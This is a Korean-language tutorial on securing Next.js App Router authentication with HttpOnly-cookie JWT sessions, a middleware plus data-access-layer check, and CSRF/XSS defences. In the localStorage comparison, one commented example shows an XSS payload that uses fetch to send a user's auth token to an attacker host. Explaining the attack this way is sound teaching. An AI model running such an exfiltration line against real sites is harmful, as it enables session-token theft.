🔐 Next.js 심화 7장: Authentication Architecture — 미들웨어 + DAL + 세션 보안 설계

2026년 4월 30일 수정됨

📋 개요

Middleware + DAL + Session 패턴으로 Next.js 앱의 인증을 안전하게 설계합니다.

📋 목차

📌 이 문서를 읽기 전에
🤔 왜 알아야 하는가
🏗️ 비유로 먼저 이해하기
🧩 인증(Authentication)의 세 기둥 🟢
🔑 세션 관리: HttpOnly 쿠키 vs localStorage 🟡
🛡️ 세션 생성과 검증 구현 🟡
🚪 미들웨어 + DAL 2단계 방어 구조 🔴
🔒 보안 강화: CSRF, XSS 방어 🔴
💥 에러 해결 카탈로그
[🏁 이번에 배운 내용 총정리](#-이번에 배운-내용-총정리)
📝 마무리 퀴즈
🔗 더 알아보기

📌 이 문서를 읽기 전에

⏱️ 예상 읽기 시간: 20분 (전체) / 핵심 파트만: 10분

🗺️ 이 문서의 배경 세계관: '영수네 커뮤니티'

영철(신입): "로그인 기능 만들었는데요, 로그인 성공하면 JWT를 localStorage에 저장하고 있어요. API 호출할 때마다 Authorization: Bearer ${token} 헤더 붙이고요. 이게 보통 하는 방식 아닌가요?"
영호(리드): "영철 님... 그 방법은 XSS 공격에 완전히 무방비예요. JS로 localStorage에 접근할 수 있으니 악성 스크립트 하나만 삽입되면 모든 사용자 토큰이 탈취돼요. Next.js App Router에서는 HttpOnly 쿠키로 토큰을 보호하고, 서버 컴포넌트에서만 세션을 검증해야 해요."

🗺️ 이 문서의 흐름
인증의 3기둥 → 세션 저장 방법 비교 → 세션 생성/검증 구현 → 미들웨어 + DAL 2단계 방어 → 보안 헤더

🎯 이 문서를 다 읽으면 할 수 있는 것

localStorage 대신 HttpOnly 쿠키로 세션을 안전하게 관리할 수 있다
미들웨어(1차)와 DAL(2차)로 이중 인증 체계를 설계할 수 있다
CSRF와 XSS 공격이 어떻게 동작하고 어떻게 방어하는지 설명할 수 있다

🤔 왜 알아야 하는가

인증은 "이 사람이 누구인가?" 를 확인하는 과정이야. 잘못 구현하면 서비스의 모든 데이터가 위험해져.

Next.js App Router가 등장하면서 인증 구현 방식이 크게 바뀌었어:

과거 SPA 방식: 클라이언트에서 API 호출 → JWT를 localStorage 저장 → 모든 요청에 헤더 첨부
App Router 방식: 서버 컴포넌트가 기본 → 서버에서 세션 검증 → HttpOnly 쿠키로 토큰 보호

왜 바꿔야 하냐고? localStorage는 JavaScript로 접근 가능하기 때문이야. XSS 공격 하나로 모든 사용자의 토큰이 털릴 수 있어.

🏗️ 비유로 먼저 이해하기

🧒 5살에게 설명한다면?
비밀 금고에 열쇠(JWT)를 보관한다고 상상해봐.

localStorage에 저장 = 열쇠를 책상 위에 올려놓기. 누구나 볼 수 있어. 나쁜 사람이 방에 들어오면(XSS) 바로 가져가.

HttpOnly 쿠키 = 열쇠를 금고 안에 넣기. 열쇠 주인(서버)만 꺼낼 수 있어. 나쁜 사람이 방에 들어와도(XSS) 금고는 못 열어.

인증의 2단계 방어:

1차 방어 (Middleware)   → "열쇠 있어요?" 빠른 체크, 없으면 문 앞에서 차단
2차 방어 (DAL)          → "열쇠가 진짜예요? 이 방 들어갈 권한 있어요?" 실제 검증

🧩 인증(Authentication)의 세 기둥 🟢

🎯 이 섹션을 읽고 나면:

인증, 세션 관리, 권한 부여의 차이를 명확히 구분할 수 있다

Next.js 인증 시스템은 세 가지 개념으로 나뉘어:

기둥	의미	담당 위치
인증(Authentication)	"당신이 누구인가?" — 신원 확인	Server Action (로그인 처리)
세션 관리(Session)	"당신이 로그인한 상태임을 기억"	HttpOnly 쿠키 + 암호화
권한 부여(Authorization)	"이 작업을 할 권한이 있는가?"	Middleware (1차) + DAL (2차)

🔑 세션 관리: HttpOnly 쿠키 vs localStorage 🟡

🎯 이 섹션을 읽고 나면:

HttpOnly 쿠키와 localStorage의 보안 차이를 설명할 수 있다

App Router에서 HttpOnly 쿠키를 사용해야 하는 이유를 이해한다

🤔 잠깐, 먼저 생각해봐
브라우저에서 document.cookie로 모든 쿠키를 읽을 수 있다고 알고 있지?
그런데 HttpOnly 쿠키는 document.cookie로 읽을 수 없어. 왜 그럴까?

비교:

특성	`localStorage`	`HttpOnly 쿠키`
JS 접근	`localStorage.getItem()` 가능	❌ JS 접근 불가
XSS 취약성	🔴 매우 취약 (JS 탈취 가능)	🟢 보호됨
SSR 지원	❌ 서버에서 읽기 불가	✅ 서버 요청마다 자동 전송
서버 컴포넌트 호환	❌ 불가	✅ `cookies()` API로 읽기 가능
만료 설정	수동 처리 필요	브라우저가 자동 처리

// ❌ 영철이의 위험한 방식 — localStorage 사용
// 클라이언트 컴포넌트에서
const token = localStorage.getItem('auth_token')
// XSS 공격으로 악성 스크립트가 삽입되면:
// document.querySelector('script').textContent = `
//   fetch('https://attacker.com?' + localStorage.getItem('auth_token'))
// `
// 토큰이 공격자 서버로 전송됨!
 
// ✅ 영호의 안전한 방식 — HttpOnly 쿠키
// Server Action에서 쿠키 설정 (서버에서만 실행)
(await cookies()).set('session', encryptedToken, {
  httpOnly: true,   // JS 접근 불가 → XSS 방어
  secure: true,     // HTTPS에서만 전송
  sameSite: 'lax',  // CSRF 방어
  maxAge: 60 * 60 * 24 * 7,  // 7일
})

🛡️ 세션 생성과 검증 구현 🟡

🎯 이 섹션을 읽고 나면:

jose 라이브러리로 JWT를 생성하고 검증할 수 있다

Server Action으로 로그인을 처리하는 전체 흐름을 구현할 수 있다

// lib/auth.ts — 세션 암호화/복호화
import 'server-only'
import { SignJWT, jwtVerify } from 'jose'   // Edge 호환 JWT 라이브러리
 
const secretKey = process.env.SESSION_SECRET!
const encodedKey = new TextEncoder().encode(secretKey)
 
type SessionPayload = {
  userId: string
  role: 'user' | 'admin'
  expiresAt: Date
}
 
// 세션 암호화 (JWT 생성)
export async function encrypt(payload: SessionPayload): Promise<string> {
  return new SignJWT(payload)
    .setProtectedHeader({ alg: 'HS256' })
    .setIssuedAt()
    .setExpirationTime('7d')           // 7일 만료
    .sign(encodedKey)
}
 
// 세션 복호화 (JWT 검증)
export async function decrypt(token: string): Promise<SessionPayload | null> {
  try {
    const { payload } = await jwtVerify(token, encodedKey, {
      algorithms: ['HS256'],
    })
    return payload as unknown as SessionPayload
  } catch {
    // 토큰이 만료됐거나 변조된 경우
    return null
  }
}

// lib/session.ts — 세션 생성/조회/삭제
import 'server-only'
import { cookies } from 'next/headers'
import { encrypt, decrypt } from './auth'
 
export async function createSession(userId: string, role: 'user' | 'admin') {
  const expiresAt = new Date(Date.now() + 7 * 24 * 60 * 60 * 1000)
  const session = await encrypt({ userId, role, expiresAt })
 
  const cookieStore = await cookies()
  cookieStore.set('session', session, {
    httpOnly: true,
    secure: process.env.NODE_ENV === 'production',
    sameSite: 'lax',
    expires: expiresAt,
    path: '/',
  })
}
 
export async function getSession() {
  const cookieStore = await cookies()
  const sessionCookie = cookieStore.get('session')?.value
  if (!sessionCookie) return null
  return decrypt(sessionCookie)
}
 
export async function deleteSession() {
  const cookieStore = await cookies()
  cookieStore.delete('session')
}

// lib/actions/auth.actions.ts — 로그인 Server Action
'use server'
import { redirect } from 'next/navigation'
import { createSession } from '../session'
import { db } from '../db'
import bcrypt from 'bcryptjs'
 
export async function login(prevState: unknown, formData: FormData) {
  const email = formData.get('email') as string
  const password = formData.get('password') as string
 
  // DB에서 사용자 조회
  const user = await db.user.findUnique({ where: { email } })
 
  // 비밀번호 검증 (bcrypt는 서버에서만 실행 — Node.js Runtime)
  if (!user || !(await bcrypt.compare(password, user.passwordHash))) {
    return { error: '이메일 또는 비밀번호가 올바르지 않아요' }
  }
 
  // 세션 생성 → HttpOnly 쿠키에 저장
  await createSession(user.id, user.role)
 
  // 로그인 성공 → 대시보드로 이동
  redirect('/dashboard')
}
 
export async function logout() {
  await deleteSession()
  redirect('/login')
}

🚪 미들웨어 + DAL 2단계 방어 구조 🔴

🎯 이 섹션을 읽고 나면:

미들웨어(1차)와 DAL(2차)이 각각 무엇을 검증하는지 설명할 수 있다

왜 2단계인가?

미들웨어(Edge)에서 무거운 검증은 불가해. 하지만 DAL에서만 검증하면 보호되지 않은 경로에서 느린 검증을 기다려야 해. 그래서 역할을 나눠:

// middleware.ts — 1차 방어: "세션 쿠키가 존재하는가?"
import { NextResponse } from 'next/server'
import type { NextRequest } from 'next/server'
 
const PROTECTED_PATHS = ['/dashboard', '/my', '/settings', '/posts/write']
 
export async function middleware(request: NextRequest) {
  const { pathname } = request.nextUrl
 
  const isProtected = PROTECTED_PATHS.some((path) => pathname.startsWith(path))
  if (!isProtected) return NextResponse.next()
 
  const sessionCookie = request.cookies.get('session')?.value
 
  // 빠른 1차 체크: 쿠키 존재 여부만
  // 실제 JWT 검증은 Edge에서 jose로 가능하지만 선택적
  if (!sessionCookie) {
    const loginUrl = new URL('/login', request.url)
    loginUrl.searchParams.set('callbackUrl', pathname)
    return NextResponse.redirect(loginUrl)
  }
 
  return NextResponse.next()
}

// lib/dal.ts — 2차 방어: "세션이 유효한가? 이 작업 권한이 있는가?"
import 'server-only'
import { getSession } from './session'
import { db } from './db'
 
export async function verifySession() {
  const session = await getSession()
  if (!session) {
    // 세션 없으면 즉시 401 처리
    throw new Error('UNAUTHORIZED')
  }
  return session
}
 
// 게시글 삭제 — 작성자 또는 관리자만 가능
export async function deletePost(postId: string) {
  const session = await verifySession()  // 세션 검증
 
  const post = await db.post.findUnique({ where: { id: postId } })
  if (!post) throw new Error('NOT_FOUND')
 
  // 권한 체크: 작성자이거나 관리자여야 함
  if (post.authorId !== session.userId && session.role !== 'admin') {
    throw new Error('FORBIDDEN')
  }
 
  return db.post.delete({ where: { id: postId } })
}

🔒 보안 강화: CSRF, XSS 방어 🔴

🛡️ CSRF 방어 — `sameSite` 쿠키 설정

CSRF(Cross-Site Request Forgery): 악성 사이트에서 사용자 몰래 우리 서버로 요청을 보내는 공격.

// sameSite 설정으로 CSRF 방어
cookieStore.set('session', session, {
  httpOnly: true,
  secure: true,
  sameSite: 'lax',    // 외부 사이트에서 POST 요청 시 쿠키 전송 안 함
  // sameSite: 'strict' → 더 강력하지만 일부 OAuth 리디렉트가 깨질 수 있음
})

Server Action의 CSRF 내장 방어:

Next.js Server Action은 내부적으로 CSRF 토큰 없이도 보호돼. 각 Server Action 함수에 암호화된 비결정적 ID를 할당해서 공격자가 엔드포인트를 유추하기 어렵게 만들어.

🛡️ XSS 방어 — CSP 헤더

// middleware.ts에서 CSP 헤더 설정
response.headers.set(
  'Content-Security-Policy',
  "default-src 'self'; script-src 'self' 'nonce-{nonce}'; style-src 'self' 'unsafe-inline';"
)

💥 에러 해결 카탈로그

❌ `cookies() was called outside a request scope`

원인: cookies()를 Server Action이나 서버 컴포넌트가 아닌 곳에서 호출.

해결책: cookies()는 반드시 서버 컴포넌트, Server Action, Route Handler 안에서만 사용해.

❌ `jose` 토큰 검증 실패 — `JWTExpired`

원인: 토큰 만료. 정상적인 동작이지만 핸들링이 필요.

해결책:

try {
  const { payload } = await jwtVerify(token, encodedKey)
  return payload
} catch (err) {
  if (err instanceof errors.JWTExpired) {
    // 만료 → 리프레시 또는 재로그인 유도
    return null
  }
  // 기타 검증 실패
  return null
}

🏁 이번에 배운 내용 총정리

📋 인증 구현 체크리스트

항목	구현 위치	중요도
세션 암호화 (`jose`)	`lib/auth.ts`	필수
`HttpOnly` 쿠키 설정	`lib/session.ts`	필수
로그인 Server Action	`lib/actions/auth.actions.ts`	필수
1차 미들웨어 방어	`middleware.ts`	필수
2차 DAL 방어	`lib/dal.ts`	필수
`server-only` import	`lib/` 파일 최상단	강력 권장

⚠️ 절대 하지 말 것

상황	❌ 나쁜 예	✅ 좋은 예
토큰 저장	`localStorage.setItem('token', jwt)`	`HttpOnly` 쿠키
미들웨어만으로 보호	Middleware만 믿고 DAL 검증 생략	Middleware + DAL 이중 방어
권한 체크 위치	클라이언트 컴포넌트에서	서버(DAL)에서 최종 검증

📝 마무리 퀴즈

Q1. localStorage 대신 HttpOnly 쿠키에 세션을 두는 가장 큰 이유는 무엇인가?

✅ 정답: 브라우저 JavaScript가 세션 값을 직접 읽지 못하게 해 XSS로 인한 토큰 탈취 위험을 줄이기 위해서다.

💡 상세 해설: HttpOnly는 만능 방어막은 아니지만, 악성 스크립트가 토큰 문자열을 훔쳐 외부로 보내는 대표 경로를 막아 준다. 쿠키에는 Secure, SameSite, Path, 만료 시간도 함께 설계해야 한다. 영호는 "저장 위치"만 보지 않고 세션 갱신과 폐기까지 본다.

Q2. Middleware와 DAL(Data Access Layer)의 역할 분담으로 가장 안전한 것은?

✅ 정답: Middleware는 빠른 1차 통과 검사, DAL은 실제 데이터 접근 직전의 정밀 인증/인가 검사를 맡는다.

💡 상세 해설: Middleware는 Edge에서 넓게 실행되므로 DB 조회나 복잡한 권한 로직을 모두 넣기 어렵다. 대신 보호 경로 진입을 빠르게 걸러낸다. 최종 보안 경계는 서버의 DAL에서 세션 유효성, 역할, 리소스 소유권을 확인해야 한다.

Q3. 영철이의 테스트 타임: 관리자 버튼은 숨겼지만 사용자가 Server Action을 직접 POST로 호출할 수 있다. 어디에서 권한을 확인해야 할까?

✅ 정답: Server Action 내부 또는 그 Action이 호출하는 서버 전용 권한 검사 함수에서 다시 확인해야 한다.

💡 상세 해설: UI에서 버튼을 숨기는 것은 사용자 경험일 뿐 보안 경계가 아니다. 공식 문서도 Server Actions와 Route Handlers를 공개 API처럼 다루라고 안내한다. 관리자 작업은 액션 내부에서 세션과 role을 확인하고, 대상 리소스의 소유권까지 검증해야 한다.

🐣 영철이의 퇴근 일기

오늘은 인증을 "로그인했는지 확인"으로만 보면 부족하다는 걸 배웠다. Middleware에서 한 번 걸렀다고 끝이 아니라, 실제 데이터를 읽거나 바꾸는 지점마다 권한을 다시 확인해야 했다.

💡 "인증은 입구에서 시작하지만, 인가는 데이터 앞에서 끝난다."

앞으로 보호 페이지를 만들 때는 쿠키 옵션, Middleware matcher, DAL 검증, Server Action 권한 검사를 한 묶음으로 보겠다. 영호에게 "버튼 숨겼어요"가 아니라 "직접 요청해도 거절됩니다"라고 말할 수 있는 설계를 가져가야겠다.